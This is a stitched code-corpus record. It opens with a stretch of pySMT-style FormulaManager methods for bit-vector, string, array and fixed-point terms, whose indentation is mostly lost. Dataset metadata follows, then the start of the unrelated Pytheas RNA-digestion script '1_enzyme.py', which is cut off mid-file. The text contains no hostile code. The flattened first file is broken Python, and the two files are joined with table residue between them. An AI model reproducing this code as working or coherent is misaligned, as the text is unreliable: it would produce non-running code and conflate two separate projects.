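    # Illustrative note (not part of the original module): EqualsOrIff dispatches
    # on the type of the left operand, so for Boolean symbols a, b it returns
    # Iff(a, b), while for integer or real terms x, y it returns Equals(x, y).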
# BitVectors
def BV(self, value, width=None):
"""Return a constant of type BitVector.
value can be either:
- a string of 0s and 1s
- a string starting with "#b" followed by a sequence of 0s and 1s
- an integer number s.t. 0 <= value < 2**width
In order to create the BV representation of a signed integer,
the SBV() method shall be used.
"""
if type(value) is str:
if value.startswith("#b"):
str_width = len(value)-2
value = int(value[2:],2)
elif all(v in ["0", "1"] for v in value):
str_width = len(value)
value = int(value, 2)
else:
raise PysmtValueError("Expecting binary value as string, got " \
"%s instead." % value)
if width is not None and width != str_width:
raise PysmtValueError("Specified width does not match string " \
"width (%d != %d)" % (width, str_width))
width = str_width
if width is None:
raise PysmtValueError("Need to specify a width for the constant")
if is_pysmt_integer(value):
_value = value
elif is_python_integer(value):
_value = pysmt_integer_from_integer(value)
else:
raise PysmtTypeError("Invalid type in constant. The type was: %s" \
% str(type(value)))
if _value < 0:
raise PysmtValueError("Cannot specify a negative value: %d" \
% _value)
if _value >= 2**width:
raise PysmtValueError("Cannot express %d in %d bits" \
% (_value, width))
return self.create_node(node_type=op.BV_CONSTANT,
args=tuple(),
payload=(_value, width))
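    # Illustrative usage sketch (not part of the original module); "mgr" below is
    # an assumed FormulaManager instance, and the three calls are equivalent
    # under the parsing rules documented above:
    #   mgr.BV("#b0101")      # width inferred from the literal -> value 5, width 4
    #   mgr.BV("0101")        # same, without the "#b" prefix
    #   mgr.BV(5, width=4)    # explicit unsigned value and width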
def SBV(self, value, width=None):
"""Returns a constant of type BitVector interpreting the sign.
        If the specified value is an integer, it is converted into the
        two's complement representation of the given number, otherwise the
behavior is the same as BV().
"""
if is_python_integer(value):
if width is None:
raise PysmtValueError("Need to specify a width for the constant")
min_val = -(2**(width-1))
max_val = (2**(width-1)) - 1
if value < min_val:
raise PysmtValueError("Cannot represent a value (%d) lower " \
"than %d in %d bits" % (value, min_val,
width))
if value > max_val:
raise PysmtValueError("Cannot represent a value (%d) greater " \
"than %d in %d bits" % (value, max_val,
width))
if value >= 0:
return self.BV(value, width)
else:
comp_value = (2**width) + value # value is negative!
return self.BV(comp_value, width)
else:
return self.BV(value, width=width)
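    # Illustrative note (not part of the original module): negative inputs are
    # encoded in two's complement, e.g. SBV(-1, 8) yields BV(255, 8) and
    # SBV(-128, 8) yields BV(128, 8), while SBV(200, 8) raises PysmtValueError
    # because 200 exceeds the signed maximum of 127 for width 8.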
def BVOne(self, width):
"""Returns the bit-vector representing the unsigned one."""
return self.BV(1, width=width)
def BVZero(self, width):
"""Returns the bit-vector with all bits set to zero."""
return self.BV(0, width=width)
def BVNot(self, formula):
"""Returns the bitvector Not(bv)"""
return self.create_node(node_type=op.BV_NOT,
args=(formula,),
payload=(formula.bv_width(),))
def BVAnd(self, left, right):
"""Returns the Bit-wise AND of two bitvectors of the same size."""
return self.create_node(node_type=op.BV_AND,
args=(left,right),
payload=(left.bv_width(),))
def BVOr(self, left, right):
"""Returns the Bit-wise OR of two bitvectors of the same size."""
return self.create_node(node_type=op.BV_OR,
args=(left,right),
payload=(left.bv_width(),))
def BVXor(self, left, right):
"""Returns the Bit-wise XOR of two bitvectors of the same size."""
return self.create_node(node_type=op.BV_XOR,
args=(left,right),
payload=(left.bv_width(),))
def BVConcat(self, left, right):
"""Returns the Concatenation of the two BVs"""
return self.create_node(node_type=op.BV_CONCAT,
args=(left,right),
payload=(left.bv_width()+right.bv_width(),))
def BVExtract(self, formula, start=0, end=None):
"""Returns the slice of formula from start to end (inclusive)."""
if end is None: end = formula.bv_width()-1
assert is_python_integer(start) and is_python_integer(end)
assert end >= start and start >= 0, "Start: %d ; End: %d" % (start,end)
size = end-start+1
assert size <= formula.bv_width(), \
"Invalid size: start=%d, end=%d, width=%d" % \
(start, end, formula.bv_width())
return self.create_node(node_type=op.BV_EXTRACT,
args=(formula,),
payload=(size, start, end))
def BVULT(self, left, right):
"""Returns the formula left < right."""
return self.create_node(node_type=op.BV_ULT,
args=(left, right))
def BVUGT(self, left, right):
"""Returns the formula left > right."""
return self.create_node(node_type=op.BV_ULT,
args=(right, left))
def BVULE(self, left, right):
"""Returns the formula left <= right."""
return self.create_node(node_type=op.BV_ULE,
args=(left, right))
def BVUGE(self, left, right):
"""Returns the formula left >= right."""
return self.create_node(node_type=op.BV_ULE,
args=(right, left))
def BVNeg(self, formula):
"""Returns the arithmetic negation of the BV."""
return self.create_node(node_type=op.BV_NEG,
args=(formula,),
payload=(formula.bv_width(),))
def BVAdd(self, left, right):
"""Returns the sum of two BV."""
return self.create_node(node_type=op.BV_ADD,
args=(left, right),
payload=(left.bv_width(),))
def BVSub(self, left, right):
"""Returns the difference of two BV."""
return self.create_node(node_type=op.BV_SUB,
args=(left, right),
payload=(left.bv_width(),))
def BVMul(self, left, right):
"""Returns the product of two BV."""
return self.create_node(node_type=op.BV_MUL,
args=(left, right),
payload=(left.bv_width(),))
def BVUDiv(self, left, right):
"""Returns the division of the two BV."""
return self.create_node(node_type=op.BV_UDIV,
args=(left, right),
payload=(left.bv_width(),))
    def BVURem(self, left, right):
        """Returns the remainder of the two BV."""
return self.create_node(node_type=op.BV_UREM,
args=(left, right),
payload=(left.bv_width(),))
def BVLShl(self, left, right):
"""Returns the logical left shift the BV."""
if is_python_integer(right):
right = self.BV(right, left.bv_width())
return self.create_node(node_type=op.BV_LSHL,
args=(left, right),
payload=(left.bv_width(),))
def BVLShr(self, left, right):
"""Returns the logical right shift the BV."""
if is_python_integer(right):
right = self.BV(right, left.bv_width())
return self.create_node(node_type=op.BV_LSHR,
args=(left, right),
payload=(left.bv_width(),))
def BVRol(self, formula, steps):
"""Returns the LEFT rotation of the BV by the number of steps."""
if not is_python_integer(steps):
raise PysmtTypeError("BVRol: 'steps' should be an integer. Got %s" \
% steps)
return self.create_node(node_type=op.BV_ROL,
args=(formula,),
payload=(formula.bv_width(), steps))
def BVRor(self, formula, steps):
"""Returns the RIGHT rotation of the BV by the number of steps."""
if not is_python_integer(steps):
raise PysmtTypeError("BVRor: 'steps' should be an integer. Got %s" \
% steps)
return self.create_node(node_type=op.BV_ROR,
args=(formula,),
payload=(formula.bv_width(), steps))
    def BVZExt(self, formula, increase):
        """Returns the extension of the BV with 'increase' additional bits.
New bits are set to zero.
"""
if not is_python_integer(increase):
raise PysmtTypeError("BVZext: 'increase' should be an integer. "
"Got %s" % increase)
return self.create_node(node_type=op.BV_ZEXT,
args=(formula,),
payload=(formula.bv_width()+increase,
increase))
    def BVSExt(self, formula, increase):
        """Returns the signed extension of the BV with 'increase' additional bits.
New bits are set according to the most-significant-bit.
"""
if not is_python_integer(increase):
raise PysmtTypeError("BVSext: 'increase' should be an integer. "
"Got %s" % increase)
return self.create_node(node_type=op.BV_SEXT,
args=(formula,),
payload=(formula.bv_width()+increase,
increase))
def BVSLT(self, left, right):
"""Returns the SIGNED LOWER-THAN comparison for BV."""
return self.create_node(node_type=op.BV_SLT,
args=(left, right))
def BVSLE(self, left, right):
"""Returns the SIGNED LOWER-THAN-OR-EQUAL-TO comparison for BV."""
return self.create_node(node_type=op.BV_SLE,
args=(left, right))
def BVComp(self, left, right):
"""Returns a BV of size 1 equal to 0 if left is equal to right,
otherwise 1 is returned."""
return self.create_node(node_type=op.BV_COMP,
args=(left, right),
payload=(1,))
def BVSDiv(self, left, right):
"""Returns the SIGNED DIVISION of left by right"""
return self.create_node(node_type=op.BV_SDIV,
args=(left, right),
payload=(left.bv_width(),))
def BVSRem(self, left, right):
"""Returns the SIGNED REMAINDER of left divided by right"""
return self.create_node(node_type=op.BV_SREM,
args=(left, right),
payload=(left.bv_width(),))
    def BVAShr(self, left, right):
        """Returns the arithmetic RIGHT shift of the left BV by the number
        of steps specified by the right BV."""
if is_python_integer(right):
right = self.BV(right, left.bv_width())
return self.create_node(node_type=op.BV_ASHR,
args=(left, right),
payload=(left.bv_width(),))
def BVNand(self, left, right):
"""Returns the NAND composition of left and right."""
return self.BVNot(self.BVAnd(left, right))
def BVNor(self, left, right):
"""Returns the NOR composition of left and right."""
return self.BVNot(self.BVOr(left, right))
def BVXnor(self, left, right):
"""Returns the XNOR composition of left and right."""
return self.BVOr(self.BVAnd(left, self.BVNot(right)),
self.BVAnd(self.BVNot(left), right))
def BVSGT(self, left, right):
"""Returns the SIGNED GREATER-THAN comparison for BV."""
return self.BVSLT(right, left)
def BVSGE(self, left, right):
"""Returns the SIGNED GREATER-THAN-OR-EQUAL-TO comparison for BV."""
return self.BVSLE(right, left)
def BVSMod(self, left, right):
"""Returns the SIGNED MODULUS of left divided by right."""
# According to SMT-LIB standard (2015-06-23) BVSMod is defined as follows
# http://smtlib.cs.uiowa.edu/logics-all.shtml#QF_BV
#
# For all terms s,t of sort (_ BitVec m), where 0 < m,
# (bvsmod s t) abbreviates
# (let ((?msb_s ((_ extract |m-1| |m-1|) s))
# (?msb_t ((_ extract |m-1| |m-1|) t)))
# (let ((abs_s (ite (= ?msb_s #b0) s (bvneg s)))
# (abs_t (ite (= ?msb_t #b0) t (bvneg t))))
# (let ((u (bvurem abs_s abs_t)))
# (ite (= u (_ bv0 m))
# u
# (ite (and (= ?msb_s #b0) (= ?msb_t #b0))
# u
# (ite (and (= ?msb_s #b1) (= ?msb_t #b0))
# (bvadd (bvneg u) t)
# (ite (and (= ?msb_s #b0) (= ?msb_t #b1))
# (bvadd u t)
# (bvneg u))))))))
m = left.bv_width()
s = left
t = right
zero_1 = self.BV("#b0")
one_1 = self.BV("#b1")
msb_s = self.BVExtract(s, m-1, m-1)
msb_t = self.BVExtract(t, m-1, m-1)
abs_s = self.Ite(self.Equals(msb_s, zero_1), s, self.BVNeg(s))
abs_t = self.Ite(self.Equals(msb_t, zero_1), t, self.BVNeg(t))
u = self.BVURem(abs_s, abs_t)
cond1 = self.Equals(u, self.BV(0, m))
cond2 = self.And(self.Equals(msb_s, zero_1), self.Equals(msb_t, zero_1))
cond3 = self.And(self.Equals(msb_s, one_1), self.Equals(msb_t, zero_1))
cond4 = self.And(self.Equals(msb_s, zero_1), self.Equals(msb_t, one_1))
case3 = self.BVAdd(self.BVNeg(u), t)
case4 = self.BVAdd(u, t)
case5 = self.BVNeg(u)
return self.Ite(self.Or(cond1, cond2), u,
self.Ite(cond3, case3, self.Ite(cond4, case4, case5)))
def BVRepeat(self, formula, count=1):
"""Returns the concatenation of count copies of formula."""
res = formula
for _ in xrange(count-1):
res = self.BVConcat(res, formula)
return res
def StrLength(self, formula):
"""Returns the length of a formula resulting a String"""
return self.create_node(node_type=op.STR_LENGTH, args=(formula,))
def StrConcat(self, *args):
"""Returns the concatenation of n Strings.
s1, s2, ..., and sn are String terms.
String concatenation takes at least 2 arguments.
"""
tuple_args = self._polymorph_args_to_tuple(args)
if len(tuple_args) <= 1:
raise TypeError("Cannot create a Str_Concat without arguments.")
return self.create_node(node_type=op.STR_CONCAT, args=tuple_args)
    def StrContains(self, s, t):
        """Returns whether the String s contains the String t.
s and t are String terms.
"""
return self.create_node(node_type=op.STR_CONTAINS, args=(s, t))
def StrIndexOf(self, s, t, i):
"""Returns the position of the first occurrence of t in s after the index i.
s and t being a non empty strings and i a non-negative integer.
It returns -1 if the value to search for never occurs.
"""
return self.create_node(node_type=op.STR_INDEXOF, args=(s, t, i))
    def StrReplace(self, s, t1, t2):
        """Returns a new string where the first occurrence of t1 is replaced by t2.
where s, t1 and t2 are string terms, t1 is non-empty.
"""
return self.create_node(node_type=op.STR_REPLACE, args=(s, t1, t2))
def StrSubstr(self, s, i, j):
"""Returns a substring of s starting at i and ending at j+i.
where s is a string term and i, j are integer terms.
"""
return self.create_node(node_type=op.STR_SUBSTR, args=(s, i, j))
    def StrPrefixOf(self, s, t):
        """Returns whether the string s is a prefix of the string t.
where s and t are string terms.
"""
return self.create_node(node_type=op.STR_PREFIXOF, args=(s, t))
def StrSuffixOf(self, s, t):
"""Returns whether the string s is a suffix of the string t.
where s and t are string terms.
"""
return self.create_node(node_type=op.STR_SUFFIXOF, args=(s, t))
def StrToInt(self, s):
"""Returns the corresponding natural number of s.
If s does not represent a natural number, it returns -1.
"""
return self.create_node(node_type=op.STR_TO_INT, args=(s,))
def IntToStr(self, x):
"""Returns the corresponding String representing the natural number x.
where x is an integer term. If x is not a natural number it
returns the empty String.
"""
return self.create_node(node_type=op.INT_TO_STR, args=(x, ))
def StrCharAt(self, s, i):
"""Returns a single character String at position i.
s is a string term and i is an integer term. i is the position.
"""
return self.create_node(node_type=op.STR_CHARAT, args=(s, i))
def BVToNatural(self, formula):
"""Returns the Natural number represented by the BitVector.
Given a BitVector of width m returns an integer between 0 and 2^m-1
"""
return self.create_node(node_type=op.BV_TONATURAL, args=(formula,))
def Select(self, arr, idx):
"""Creates a node representing an array selection."""
return self.create_node(node_type=op.ARRAY_SELECT, args=(arr, idx))
def Store(self, arr, idx, val):
"""Creates a node representing an array update."""
return self.create_node(node_type=op.ARRAY_STORE, args=(arr, idx, val))
def Array(self, idx_type, default, assigned_values=None):
"""Creates a node representing an array having index type equal to
idx_type, initialized with default values.
If assigned_values is specified, then it must be a map from
constants of type idx_type to values of the same type as
default and the array is initialized correspondingly.
"""
if not isinstance(idx_type, types.PySMTType):
raise PysmtTypeError("idx_type is not a valid type: '%s'" % idx_type)
args = [default]
if assigned_values:
for k in sorted(assigned_values, key=id):
if not k.is_constant():
raise PysmtValueError("Array initialization indexes must "
"be constants")
# It is useless to represent assignments equal to the default
if assigned_values[k] != default:
args.append(k)
args.append(assigned_values[k])
return self.create_node(node_type=op.ARRAY_VALUE, args=tuple(args),
payload=idx_type)
def _Algebraic(self, val):
"""Returns the algebraic number val."""
return self.create_node(node_type=op.ALGEBRAIC_CONSTANT,
args=tuple(),
payload=val)
# FixedPoint functions
def UFXP(self, bv, fb):
if type(fb) is FNode and (fb.node_type() is op.INT_CONSTANT or
fb.node_type() is op.REAL_CONSTANT):
fb = int(fb._content.payload)
return self.create_node(node_type=op.UFXP_CONSTANT,
args=(bv,),
payload=(fb,))
def SFXP(self, bv, fb):
if type(fb) is FNode and (fb.node_type() is op.INT_CONSTANT or
fb.node_type() is op.REAL_CONSTANT):
fb = int(fb._content.payload)
return self.create_node(node_type=op.SFXP_CONSTANT,
args=(bv,),
payload=(fb,))
def TOSFXP(self, om, rm, src, tb, fb):
if type(fb) is FNode and (fb.node_type() is op.INT_CONSTANT or
fb.node_type() is op.REAL_CONSTANT):
fb = int(fb._content.payload)
if type(tb) is FNode and (tb.node_type() is op.INT_CONSTANT or
tb.node_type() is op.REAL_CONSTANT):
tb = int(tb._content.payload)
return self.create_node(node_type=op.TO_SFXP,
args=(om, rm, src),
payload=(tb, fb))
def TOUFXP(self, om, rm, src, to_tb, to_fb):
src_ty = self.env.stc.get_type(src)
if type(to_fb) is FNode and (to_fb.node_type() is op.INT_CONSTANT or
to_fb.node_type() is op.REAL_CONSTANT):
to_fb = int(to_fb._content.payload)
if type(to_tb) is FNode and (to_tb.node_type() is op.INT_CONSTANT or
to_tb.node_type() is op.REAL_CONSTANT):
to_tb = int(to_tb._content.payload)
return self.create_node(node_type=op.TO_UFXP,
args=(om, rm, src),
payload=(to_tb, to_fb,
src_ty._total_width, src_ty._frac_width))
def UFXPLT(self, left, right):
"""Returns the formula left < right."""
return self.create_node(node_type=op.UFXP_LT,
args=(left, right))
def SFXPLT(self, left, right):
"""Returns the formula left < right."""
return self.create_node(node_type=op.SFXP_LT,
args=(left, right))
def UFXPLE(self, left, right):
"""Returns the formula left <= right."""
return self.create_node(node_type=op.UFXP_LE,
args=(left, right))
def SFXPLE(self, left, right):
"""Returns the formula left <= right."""
return self.create_node(node_type=op.SFXP_LE,
args=(left, right))
def UFXPGT(self, left, right):
"""Returns the formula right < left."""
return self.create_node(node_type=op.UFXP_LT,
args=(right, left))
def SFXPGT(self, left, right):
"""Returns the formula right < left."""
return self.create_node(node_type=op.SFXP_LT,
args=(right, left))
def UFXPGE(self, left, right):
"""Returns the formula right <= left."""
return self.create_node(node_type=op.UFXP_LE,
args=(right, left))
def SFXPGE(self, left, right):
"""Returns the formula right <= left."""
return self.create_node(node_type=op.SFXP_LE,
args=(right, left))
def UFXPAdd(self, om, left, right):
"""Returns the sum of two unsigned fixed-points."""
return self.create_node(node_type=op.UFXP_ADD,
args=(om, left, right))
def SFXPAdd(self, om, left, right):
"""Returns the addition of two signed fixed-points."""
return self.create_node(node_type=op.SFXP_ADD,
args=(om, left, right))
def UFXPSub(self, om, left, right):
"""Returns the addition of two unsigned fixed-points."""
return self.create_node(node_type=op.UFXP_SUB,
args=(om, left, right))
def SFXPSub(self, om, left, right):
"""Returns the subtraction of two signed fixed-points."""
return self.create_node(node_type=op.SFXP_SUB,
args=(om, left, right))
def UFXPMul(self, om, rm, left, right):
"""Returns the multiplication of two unsigned fixed-points."""
return self.create_node(node_type=op.UFXP_MUL,
args=(om, rm, left, right))
def SFXPMul(self, om, rm, left, right):
"""Returns the multiplication of two signed fixed-points."""
return self.create_node(node_type=op.SFXP_MUL,
args=(om, rm, left, right))
def UFXPDiv(self, om, rm, left, right):
"""Returns the division of two unsigned fixed-points."""
return self.create_node(node_type=op.UFXP_DIV,
args=(om, rm, left, right))
def SFXPDiv(self, om, rm, left, right):
"""Returns the division of two signed fixed-points."""
return self.create_node(node_type=op.SFXP_DIV,
args=(om, rm, left, right))
def SFXPNeg(self, om, arg):
"""Returns the negation of a signed fixed-point number."""
ty = self.env.stc.get_type(arg)
total_width = ty.total_width
frac_width = ty.frac_width
return self.SFXPSub(om,
self.SFXP(self.SBV(0, total_width), frac_width),
arg)
def ST(self):
return self.create_node(node_type=op.ST, args=())
def WP(self):
return self.create_node(node_type=op.WP, args=())
def RU(self):
return self.create_node(node_type=op.RU, args=())
def RD(self):
return self.create_node(node_type=op.RD, args=())
#
# Helper functions
#
def normalize(self, formula):
"""Returns the formula normalized to the current Formula Manager.
This method is useful to contextualize a formula coming from another
formula manager.
E.g., f_a is defined with the FormulaManager a, and we want to
        obtain f_b, that is, the formula f_a expressed in the
        FormulaManager b: f_b = b.normalize(f_a)
"""
normalizer = FormulaContextualizer(self.env)
return normalizer.walk(formula)
def _polymorph_args_to_tuple(self, args):
""" Helper function to return a tuple of arguments from args.
        This function allows N-ary operators to accept their arguments
        either as a single list or as separate arguments: e.g.,
And([a,b,c]) and And(a,b,c)
are both valid, and they are converted into a tuple (a,b,c) """
if len(args) == 1 and isinstance(args[0], Iterable):
args = args[0]
return tuple(args)
def __contains__(self, node):
"""Checks whether the given node belongs to this formula manager.
This overloads the 'in' operator, making it possible to write:
E.g., if x in formula_manager: ...
"""
if node._content in self.formulae:
return self.formulae[node._content] == node
else:
return False
#EOC FormulaManager
class FormulaContextualizer(IdentityDagWalker):
"""Helper class to recreate a formula within a new environment."""
def __init__(self, env=None):
IdentityDagWalker.__init__(self, env=env)
self.type_normalize = self.env.type_manager.normalize
def walk_symbol(self, formula, args, **kwargs):
# Recreate the Symbol taking into account the type information
ty = formula.symbol_type()
newty = self.type_normalize(ty)
return self.mgr.Symbol(formula.symbol_name(), newty)
def walk_array_value(self, formula, args, **kwargs):
# Recreate the ArrayValue taking into account the type information
assign = dict(zip(args[1::2], args[2::2]))
ty = self.type_normalize(formula.array_value_index_type())
return self.mgr.Array(ty, args[0], assign)
def walk_function(self, formula, args, **kwargs):
# We re-create the symbol name
old_name = formula.function_name()
new_name = self.walk_symbol(old_name, None)
return self.mgr.Function(new_name, args)
| 38.026625
| 86
| 0.553089
|
c37772a0b88a5e2b9ea81e6276f1311b5b2623fa
| 21,306
|
py
|
Python
|
CL_version/in_silico_digestion/1_enzyme.py
|
ldascenzo/pytheas
|
1010bb082fa3db35db73b936195e00c76aaa4525
|
[
"MIT"
] | null | null | null |
CL_version/in_silico_digestion/1_enzyme.py
|
ldascenzo/pytheas
|
1010bb082fa3db35db73b936195e00c76aaa4525
|
[
"MIT"
] | null | null | null |
CL_version/in_silico_digestion/1_enzyme.py
|
ldascenzo/pytheas
|
1010bb082fa3db35db73b936195e00c76aaa4525
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
"""
Last update: November 2021
Author: Luigi D'Ascenzo, PhD - The Scripps Research Institute, La Jolla (CA)
Contact info: dascenzoluigi@gmail.com
GitHub project repository: https://github.com/ldascenzo/pytheas
***DESCRIPTION***
First step of the Pytheas in silico digestion library generation. The given RNA sequence(s) in fasta format are cleaved
with a specific RNA endonuclease enzyme (or left uncleaved if the user so chooses). Additional parameters such as missed
cleavages (up to 4) and the 3' and 5' chemistry [P, OH or cP] of the nucleolytic fragments and of the whole RNA molecule
are optional. If nonspecific nucleolytic cleavage is requested, the minimum and maximum nucleolytic sequence lengths
have to be specified.
***OPTIONS***
--RNA_sequences (REQUIRED) -> Input RNA sequence file(s) in fasta format. First string of the header for each sequence
will be used as sequence id. NOTE: file names input without "=" nor comma.
--enzyme (REQUIRED) -> RNA endonuclease selected for the digestion: options are in the following dictionary, where
a * indicates the cleaving site {'A': ['C*', 'U*'], 'T1': ['G*'], 'U2': ['A*', 'G*'],
'Cus': ['C*A', 'C*G', 'C*U'], 'MC1': ['U*U', 'C*U', 'A*U'], 'MAZ': ['*ACA'],
                                         'none': no cleavage, 'nonspecific': cleaves after every nucleotide, generating
                                         sequences whose lengths are bounded by the nonspecific_min_length and
                                         nonspecific_max_length options, 'custom': custom input cleavage file}
--custom_enzyme (OPTIONAL) -> input file for custom cleavage, where all the cleavage sites are indicated one per line
using the * for the cleaving point (e.g. C*A for cutting after a C and before A or
G* for cutting after every G). Some IUPAC one letter code for nucleotides are supported,
Y for pyrimidines (C or U), R for purines (A or G) and N for any nucleotide (A, C, G or U)
--miss (OPTIONAL, DEFAULT = 0) -> number of possible consecutive missed cleavages (up to).
--nonspecific_min_length (OPTIONAL, DEFAULT = 3) -> Minimum length for the nucleolytic fragments obtained if
nonspecific cleavage is selected.
--nonspecific_max_length (OPTIONAL, DEFAULT = 10) -> Maximum length for the nucleolytic fragments obtained if
nonspecific cleavage is selected.
--cleaved_fragments_5end_chem (OPTIONAL, DEFAULT='OH') -> 5' chemistry of the RNA nucleolytic fragments
Possible choices=['OH', 'P']. NOTE: parameters input without "=" nor comma.
--cleaved_fragments_3end_chem (OPTIONAL, DEFAULT='P') -> 3' chemistry of the RNA nucleolytic fragments
Possible choices=['OH', 'P', 'cP']. NOTE: parameters input without "=" nor comma.
--RNA_5end_chem (OPTIONAL, DEFAULT='P') -> 5' chemistry of the input RNA molecule(s) ['OH' or 'P'].
NOTE: this refers to the whole RNA molecule and not to the nucleolytic fragments. Parameters
input without "=" nor comma.
--RNA_3end_chem (OPTIONAL, DEFAULT='OH') -> 3' chemistry of the input RNA molecule(s) ['OH' or 'P'].
NOTE: this refers to the whole RNA molecule and not to the nucleolytic fragments. Parameters
input without "=" nor comma.
***OUTPUT***
1) output.1 file contains all the RNA nucleolytic fragments with info on their sequence, numbering referred to the input
RNA sequence, number of missed cleavages and 3'/5'-end chemistry.
2) seq_output containing a compact version of the input RNA sequences, used for modification sites validation in later
steps of the in silico digestion generation
"""
import argparse
import os
import re
import sys
from Bio import SeqIO
# Initialize and define launch options
parser = argparse.ArgumentParser(description='List of available options')
parser.add_argument('--RNA_sequences', nargs='*', required=True,
help='Input RNA sequence file(s). Please use fasta format and input the file names without '
'"=" after the option. First string of the header for each sequence will be used as id')
parser.add_argument('--enzyme', choices=['A', 'T1', 'U2', 'none', 'nonspecific', 'Cus',
'MC1', 'MAZ', 'custom'], required=True,
help='Nuclease enzyme used for digestion')
parser.add_argument('--custom_enzyme', default=None, help='Input file with custom enzymatic cleavage sites')
parser.add_argument('--miss', type=int, choices=[0, 1, 2, 3, 4], default=0,
                    help='Number of possible consecutive missed cleavages to consider (max 4), up to the given value')
parser.add_argument('--nonspecific_min_length', type=int, default=3,
help='Minimum length for the oligos obtained from nonspecific cleavage. Default = 3')
parser.add_argument('--nonspecific_max_length', type=int, default=10,
help='Maximum length for the oligos obtained from nonspecific cleavage. Default = 10')
parser.add_argument("--cleaved_fragments_5end_chem", nargs='*', default=['OH'], choices=['OH', 'P'],
help="Set the 5' chemistry of the RNA fragments cleaved from the chosen endonuclease to be 'OH' or "
"'P' . Input of values spaced without '=' nor commas (default = OH)")
parser.add_argument("--cleaved_fragments_3end_chem", nargs='*', default=['P'], choices=['OH', 'P', 'cP'],
help="Set the 3' chemistry of the RNA fragments cleaved from the chosen endonuclease to be 'OH', "
"'P' or 'cP'. Input of values spaced without '=' nor commas (default = P)")
parser.add_argument("--RNA_5end_chem", nargs='*', default=['P'], choices=['OH', 'P'],
help="Set the 5' chemistry of the input RNA molecule(s) [options are 'OH' or 'P' ]. "
"Note that this option refers to the whole RNA molecule and not to oligomers after digestion "
"Input of values spaced without '=' nor commas (default = P)")
parser.add_argument("--RNA_3end_chem", nargs='*', default=['OH'], choices=['OH', 'P', 'cP'],
help="Set the 3' chemistry of the input RNA molecule(s) [options are 'OH', 'P' or 'cP']. "
"Note that this option refers to the whole RNA molecule and not to oligomers after digestion "
"Input of values spaced without '=' nor commas (default = OH)")
args = parser.parse_args()
def read_custom_enzyme(infile):
"""
Create a list of custom RNase cleaving sites from an input file
"""
outlist = []
with open(infile.rstrip(), 'r') as handle:
for line in handle:
if '*' in line and line[0] != '#':
outlist.append(line.rstrip())
return outlist
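# A custom cleavage file (hypothetical example) lists one site per line, with '*' marking the cut
# position, e.g. a file containing the three lines "G*", "C*A" and "Y*N" (the IUPAC codes Y, R and
# N are supported); lines starting with '#' or without a '*' are skipped by read_custom_enzyme.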
def enzyme_cut():
"""
Define the dictionary of the standard RNase cleaving sites identified with a *
"""
return {'A': ['C*', 'U*'], 'T1': ['G*'], 'U2': ['A*', 'G*'], 'Cus': ['C*A', 'C*G', 'C*U'],
'MC1': ['U*U', 'C*U', 'A*U'], 'MAZ': ['*ACA'], 'none': []}
def iupac_letter_codes_nts():
"""
Dictionary with the one letter code symbols for RNA nucleotides
From: https://www.megasoftware.net/web_help_7/rh_iupac_single_letter_codes.htm
"""
return {'A': 'A', 'C': 'C', 'G': 'G', 'U': 'U', 'Y': '[CU]', 'R': '[AG]', 'N': '[ACGU]'}
def print_ReSites(id, sequence, enzyme):
output_lines = []
global pattern_glob
pattern_glob = []
if enzyme == 'none':
sites = []
# Adding only one fragment in the case of no enzymatic digestion
output_lines.append("{} {} {} {} {}\n".format(id, sequence, str(1), str(len(sequence)), str(
0)))
else:
sites = []
if enzyme == 'custom':
if not args.custom_enzyme:
print(
"ERROR!! Select an input file with the custom cleaving sites")
sys.exit(1)
else:
cleaving_sites = read_custom_enzyme(args.custom_enzyme)
else:
cleaving_sites = enzyme_cut()[enzyme]
for cut in cleaving_sites:
s = cut.split('*')
if s[0] != '' and s[1] != '':
nt1, nt2 = '', ''
for letter in s[0]:
nt1 += iupac_letter_codes_nts()[letter]
for letter in s[1]:
nt2 += iupac_letter_codes_nts()[letter]
pattern = r"(?=({0}{1}))".format(nt1, nt2)
pattern_glob.append(pattern)
sites += [(str(m.start() + len(s[0]) - 1), pattern) for m in re.finditer(pattern, sequence)]
else:
if s[0] == '':
nt = ''
for letter in s[1]:
nt += iupac_letter_codes_nts()[letter]
if len(nt) == 1:
pattern = r"(?!^)({0})".format(nt)
else:
pattern = r"(?!^)(?=({0}))".format(nt)
pattern_glob.append(pattern)
sites += [(str(m.start() - 1), pattern) for m in re.finditer(pattern, sequence)]
if s[1] == '':
nt = ''
for letter in s[0]:
nt += iupac_letter_codes_nts()[letter]
if len(nt) == 1:
pattern = r"({0})(?!$)".format(nt)
else:
pattern = r"(?=({0})(?!$))".format(nt)
pattern_glob.append(pattern)
sites += [(str(m.start() + len(s[0]) - 1), pattern) for m in re.finditer(pattern, sequence)]
# Order the list of all the cleavage sites for the given enzyme
sites.sort(key=lambda y: int(y[0]))
if sites:
# Dirty trick: manually adding the first fragment to the fragments list
output_lines.append("{} {} {} {} {}\n".format(id, sequence[:int(sites[0][0]) + 1], str(1),
str(int(sites[0][0]) + 1), str(0)))
sites.append(str(len(sequence)))
# Loop to add all the remaining fragments to the output list
for start, end in zip(sites, sites[1:]):
if type(end) == tuple:
if sequence[int(start[0]) + 1:int(end[0]) + 1]:
output_lines.append(
"{} {} {} {} {} {}\n".format(id, sequence[int(start[0]) + 1:int(end[0]) + 1],
str(int(start[0]) + 2),
str(int(end[0]) + 1), str(0), start[1]))
else:
if sequence[int(start[0]) + 1:int(end) + 1]:
output_lines.append(
"{} {} {} {} {} {}\n".format(id, sequence[int(start[0]) + 1:int(end) + 1], str(int(start[0]) + 2),
str(int(end)), str(0), start[1]))
return output_lines
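# Rough illustration (editor's sketch): for molecule id 'seq1' with sequence 'GGAUC' and enzyme
# 'T1' (cuts after every G), print_ReSites returns lines roughly equivalent to
#   seq1 G 1 1 0
#   seq1 G 2 2 0 <pattern>
#   seq1 AUC 3 5 0 <pattern>
# i.e. fragment, 1-based start/end positions and missed-cleavage count; the regex pattern that
# produced the cut is appended to all but the first fragment and is later stripped by clean_lines().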
def miss_1(input_list):
"""
Generate the fragments with 1 missed cleavage
"""
output_list = []
for x, y in zip(input_list, input_list[1:]):
miss = 0
for pattern in pattern_glob:
miss += len(re.findall(pattern, f"{x.split()[1]}{y.split()[1]}"))
output_list.append(
"{} {}{} {} {} {}\n".format(x.split()[0], x.split()[1], y.split()[1], x.split()[2], y.split()[3], miss))
return input_list + output_list
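# Continuing the sketch above: applying miss_1 to the three 'GGAUC'/T1 fragments appends
# 'seq1 GG 1 2 1' and 'seq1 GAUC 2 5 1', i.e. each pair of adjacent fragments joined, with the
# missed-cleavage count recomputed by re-matching the cleavage patterns inside the joined sequence.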
def miss_2(input_list):
"""
